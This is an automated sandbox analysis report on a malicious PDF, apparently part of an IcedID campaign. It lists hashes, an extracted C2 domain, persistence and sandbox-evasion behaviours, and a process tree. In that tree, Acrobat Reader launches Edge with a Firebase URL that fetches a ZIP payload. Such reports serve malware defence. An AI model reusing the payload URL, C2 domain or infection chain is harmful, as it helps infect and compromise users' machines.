Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-01-2023 20:34
Behavioral task
behavioral1
Sample
111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf
Resource
win10v2004-20220812-en
General
-
Target
111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf
-
Size
150KB
-
MD5
40d02739328a2b96cbbaec90a58137a0
-
SHA1
9fbb76197b155edd7197095c78f49e58d0268de2
-
SHA256
111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6
-
SHA512
fc695cfc902dc2ec5585a7c1592d979c88f2dae40562898762511332d175d4372301f6b52d87bdf918dba1732e534b7836ddd8aa5749dc2d06b630ba176f5355
-
SSDEEP
1536:rVTYjPXB7x4IzZwP236NntGB/HcDTIaxeMCcWXz+dqaxA1oPn6b9SBVxqntRZkBz:xkjfVl8Ntu/ATsMaDUysdivS1Ua9OS
Malware Config
Extracted
icedid
3108046779
klayerziluska.com
Signatures
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 5416 rundll32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
cmd.exedescription ioc process File opened (read-only) \??\E: cmd.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\de538387-7ad1-499c-a5f4-b415851e21ab.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230123213446.pma setup.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service msedge.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
msedge.exemsedge.exemsedge.exeidentity_helper.exeAcroRd32.exerundll32.exepid process 1892 msedge.exe 1892 msedge.exe 1592 msedge.exe 1592 msedge.exe 1712 msedge.exe 1712 msedge.exe 5328 identity_helper.exe 5328 identity_helper.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 5416 rundll32.exe 5416 rundll32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
AcroRd32.exemsedge.exepid process 4656 AcroRd32.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe 1592 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe 4656 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AcroRd32.exeRdrCEF.exedescription pid process target process PID 4656 wrote to memory of 1444 4656 AcroRd32.exe RdrCEF.exe PID 4656 wrote to memory of 1444 4656 AcroRd32.exe RdrCEF.exe PID 4656 wrote to memory of 1444 4656 AcroRd32.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 5112 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe PID 1444 wrote to memory of 4204 1444 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\111871764f74f2de6f58ec30cb84682b68bab22b59f91660c81f06ab4cb306b6.pdf"1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6B51EC32697E9A3F71B246CC0E0D842C --mojo-platform-channel-handle=1756 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=34099F08FECCEFB0E8A7425627577188 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=34099F08FECCEFB0E8A7425627577188 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:13⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FEA8C96D6CE8978D0065B4837DB012D9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FEA8C96D6CE8978D0065B4837DB012D9 --renderer-client-id=4 --mojo-platform-channel-handle=2180 --allow-no-sandbox-job /prefetch:13⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=824AB54CD834D8A14D090DC04CE3F9F8 --mojo-platform-channel-handle=2208 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C34EE0A181B34C3F44BF7688506F111B --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CE81DA89795E1CB36A8D5C6E0C28FDFE --mojo-platform-channel-handle=1900 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://firebasestorage.googleapis.com/v0/b/profound-veld-372422.appspot.com/o/6ncxCfGfXG%2FPaid_Offer_83_Jan_19.zip?alt=media&token=df54093b-4acf-45a1-8c62-d1100bc5a46f2⤵
- Adds Run key to start application
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1bcb46f8,0x7ffe1bcb4708,0x7ffe1bcb47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4036 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5564 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5320 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff77b6a5460,0x7ff77b6a5470,0x7ff77b6a54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2148,267214816980978395,7639383349087946910,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:83⤵
-
